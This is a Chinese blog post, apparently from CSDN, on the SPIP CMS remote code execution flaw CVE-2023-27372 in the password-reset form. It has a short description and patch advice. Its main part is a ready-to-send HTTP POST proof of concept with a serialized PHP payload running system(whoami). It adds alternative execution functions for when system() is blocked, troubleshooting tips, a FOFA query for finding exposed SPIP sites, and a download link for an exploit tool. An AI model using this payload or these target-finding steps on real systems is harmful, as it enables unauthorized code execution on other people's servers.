SPIP远程代码执行漏洞(CVE-2023-27372)

文章详细介绍了SPIPCMS的一个严重漏洞,该漏洞存在于4.2.1之前的版本中,允许攻击者通过未过滤的序列化字符串在密码重置功能中执行远程代码。影响版本为SPIP<4.2.1。修复建议是更新到最新补丁版本4.2.2,以解决此安全问题。
摘要由CSDN通过智能技术生成

一、漏洞描述

SPIP Cms v4.2.1之前版本允许通过公共区域中的表单值远程执行代码,因为序列化处理不当。

二、漏洞分析

漏洞存在与密码重置功能中(漏洞点位url:/spip.php?page=spip_pass),重置密码时 protege_champ()函数没有对序列化字符串进行过滤,从而触发命令执行漏洞。

三、影响版本

SPIP < 4.2.1

**FOFA语句:**app=“SPIP”

四、漏洞复现

POC

POST /spip.php?page=spip_pass HTTP/1.1
Host:	
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
Connection: close
Upgrade-Insecure-Requests: 1

page=spip_pass&formulaire_action=oubli&formulaire_action_args=CSRF_TOKEN&oubli=s:19:"<?php system(whoami); ?>";&nobot=

在这里插入图片描述
Payload解释:s表示字符串格式,26表示Payload长度(冒号以内),如果禁用system(),可以使用shell_exec()、passthru()、proc_open()等等

1、注意看清目标是什么系统,不一定只是Linux

2、命令执行失败:(1)看一下禁用函数。(2)更换命令执行函数。(3)字符原因。(4)系统环境问题。

3、响应包搜索id='oubli’就是命令执行的结果。

小龙工具复现:

在这里插入图片描述

下载链接:https://pan.baidu.com/s/1kCG5D4PMwY5wKeR47yL6iA?pwd=6666
提取码:6666

五、修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://git.spip.net/spip/spip/src/tag/v4.2.2
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全攻防赵小龙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值